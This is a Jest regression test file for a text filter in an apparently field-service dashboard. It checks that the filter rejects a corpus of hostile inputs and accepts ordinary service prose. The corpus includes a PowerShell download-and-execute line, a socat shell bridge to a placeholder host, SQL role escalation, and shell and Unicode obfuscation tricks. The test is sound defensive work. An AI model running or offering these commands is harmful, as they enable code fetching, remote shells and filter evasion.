'use strict';

const fs = require('fs');
const path = require('path');
const professionalTextPolicy = require('../../public/js/polaris-professional-text');

const HOSTILE_PRESENTATION_CORPUS = Object.freeze([
  "SELECT 'secret';",
  'SHOW ALL;',
  'DESCRIBE customers;',
  'PRAGMA integrity_check;',
  'USE private_db;',
  "ATTACH DATABASE 'private.db' AS hidden;",
  'DETACH DATABASE hidden;',
  'SET ROLE administrator;',
  'RESET ALL;',
  "ALTER SYSTEM SET log_statement = 'all';",
  'REINDEX DATABASE private_db;',
  'CLUSTER customers;',
  'REFRESH MATERIALIZED VIEW private_jobs;',
  'LOCK TABLE customers;',
  'DISCARD ALL;',
  'VALUES (1);',
  'VACUUM;',
  'ANALYZE;',
  'CHECKPOINT;',
  "COPY (SELECT 1) TO '/tmp/private';",
  'gh pr view 157',
  'gh.exe auth status',
  'winget install private-tool',
  'choco install private-tool',
  'scoop install private-tool',
  'certbot renew',
  'make install',
  'eval true',
  'exec whoami',
  'doas whoami',
  'command whoami',
  'builtin whoami',
  '. private.env',
  "g''it status",
  "'gi''t' status",
  'g${IFS}it status',
  'Get-`\nItem env:PATH',
  'cmd.exe /d /s /c whoami',
  '%COMSPEC% /d /c whoami',
  'C:\\Windows\\System32\\cmd.exe /d /c whoami',
  "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/p')",
  '&{whoami}',
  '. { whoami }',
  'bash<<<whoami',
  'env whoami',
  '/usr/bin/env whoami',
  'nohup whoami &',
  'time whoami',
  'nice whoami',
  'strace whoami',
  'ltrace whoami',
  'setsid whoami',
  'socat EXEC:whoami TCP:example.invalid:1',
  'busybox sh -c whoami',
  'openssl enc -d -in private.bin',
  'podman-compose up',
  'ansible-vault view private.yml',
  'terraform console',
  'aws sts get-caller-identity',
  'iex whoami',
  'iwr https://example.invalid/private',
  '/usr/bin/whoami',
  './private.sh',
  '..\\private.cmd /silent',
  'C:\\private\\tool.exe /silent',
  '$env:TEMP\\private.ps1 -Quiet',
  '%TEMP%\\private.cmd /silent',
  'unknownctl | sh',
  'puts "private"',
  'system "whoami"',
  'Process.Start "cmd.exe"',
  'os::system("id")',
  "require 'child_process'",
  'public static void main(String[] args) { }',
  'Recommended action: SELECT\tcurrent_user;',
  'Recommended action: A\u034fLTER SYSTEM SET role = admin;',
  'Recommended action: c\u200bmd.exe /d /c whoami',
  'Recommended action: GH PR VIEW 157',
  'Recommended action: g""it status',
  "Recommended action: g''it status",
  'Recommended action: Get-`\nChildItem env:',
  'Recommended action: %COMSPEC% /d /c whoami',
  'Recommended action: /usr/bin/env whoami',
  'Recommended action: C:\\private\\tool.exe /silent',
  'Recommended action: .\\private.ps1 -Quiet',
  'Recommended action: ALTER SYSTEM SET role = admin;',
  'Recommended action: SET ROLE administrator;',
  'Recommended action: REFRESH MATERIALIZED VIEW private_jobs;',
  'Recommended action: COPY (SELECT 1) TO STDOUT;',
  'For diagnostics, SHOW ALL;',
  'Please SHOW ALL;',
  'The check uses PRAGMA integrity_check;',
  'For diagnostics, SET ROLE administrator;',
  'For diagnostics, REFRESH MATERIALIZED VIEW private_jobs;',
  "The check uses SELECT 'secret';",
  'powershell whoami',
  'java -jar /tmp/private.jar',
  'java com.example.PrivateMain',
  'java PrivateMain',
  'javac /tmp/PrivateMain.java',
  'jshell /tmp/private.jsh',
  'service restart northstar',
]);

const PROFESSIONAL_SERVICE_PROSE = Object.freeze([
  'Select Tuesday from availability.',
  'Select HVAC from inventory.',
  'Grant access on Monday to Alex.',
  'Revoke access on Friday from Jordan.',
  'The diagnostic requires Java compatibility with the control panel.',
  'The customer requires Ruby finish on the cabinet.',
  'Required node replacement is scheduled for Friday.',
  'The node equipment replacement is scheduled for Friday.',
  'The API integration is configured for the CRM.',
  'The SMS reminder is scheduled for 9:30 AM.',
  'HVAC maintenance is due on September 15, 2026.',
  'The estimate is $1,250.00 plus 6.5% tax.',
  'Payment terms are Net 30.',
  "The customer can't meet before 3:00 PM.",
  'Please run a diagnostic inspection before the visit.',
  'Please execute the approved safety review.',
  'Run the scheduled maintenance visit tomorrow.',
  'Use Ruby finish material for the cabinet.',
  'Use node replacement terminology in the report.',
  'The Java compatibility review is complete.',
  'The branch office will close at 5:00 PM.',
  'The package arrived at the customer location.',
  'The customer asked us to update the appointment.',
  'Move the appointment to Tuesday afternoon.',
  'Install the replacement compressor after approval.',
  'Remove the damaged panel during the service visit.',
  'Call the customer before dispatch.',
  'Send the estimate after the technician confirms scope.',
  'The diagnostic found a low-voltage condition.',
  'The control board reports intermittent pressure loss.',
  'The customer selected the premium maintenance plan.',
  'Please review the API compatibility notes with the technician.',
  'The CRM record shows two prior service visits.',
  'The SMS campaign is paused until the owner approves it.',
  'Schedule a follow-up inspection for next Thursday.',
  'The current estimate includes labor and approved materials.',
  'Use the approved customer-facing description.',
  'The customer requested a white finish and brass hardware.',
  'We need access to the mechanical room on Monday.',
  'The owner will grant access when the technician arrives.',
  'The administrator approved the service window.',
  'The job requires a two-person crew for safe lifting.',
  'The pressure reading is within the manufacturer range.',
  'The replacement part is compatible with the existing unit.',
  'The customer prefers email updates instead of SMS.',
  'The appointment window is 10:00 AM to 12:00 PM.',
  'The account has a 20% service discount this month.',
  'The invoice is due 30 days after completion.',
  'The work order includes an equipment serial number.',
  'The technician will document the before-and-after readings.',
  'The follow-up visit is optional unless the noise returns.',
  'The customer approved the revised scope but not the add-on.',
  'The service agreement renews on January 1, 2027.',
  'The technician will show all approved options at the visit.',
  'Please describe customer preferences in the service note.',
  'PowerShell Road is outside the current service area.',
  'Java compatibility requirement',
  'Service',
]);

describe('P6 final-audit correction regressions', () => {
  test.each(HOSTILE_PRESENTATION_CORPUS)('rejects hostile professional-text grammar: %s', value => {
    expect(professionalTextPolicy.isProfessionalText(value)).toBe(false);
  });

  test.each(PROFESSIONAL_SERVICE_PROSE)('accepts legitimate professional/service prose: %s', value => {
    expect(professionalTextPolicy.isProfessionalText(value)).toBe(true);
  });

  test('selected-record UI owns initial presentation while true empty UI retains its welcome', () => {
    const html = fs.readFileSync(path.join(__dirname, '..', '..', 'public', 'dashboard', 'polaris.html'), 'utf8');
    expect(html).toMatch(/function\s+syncWelcomePresentation\s*\(/);
    expect(html).toMatch(/syncWelcomePresentation\(Boolean\(activeSelection\)\)/);
    expect(html).toMatch(/renderSelectedContext\(\);\s*loadConversationAccess\(\);/);
  });
});
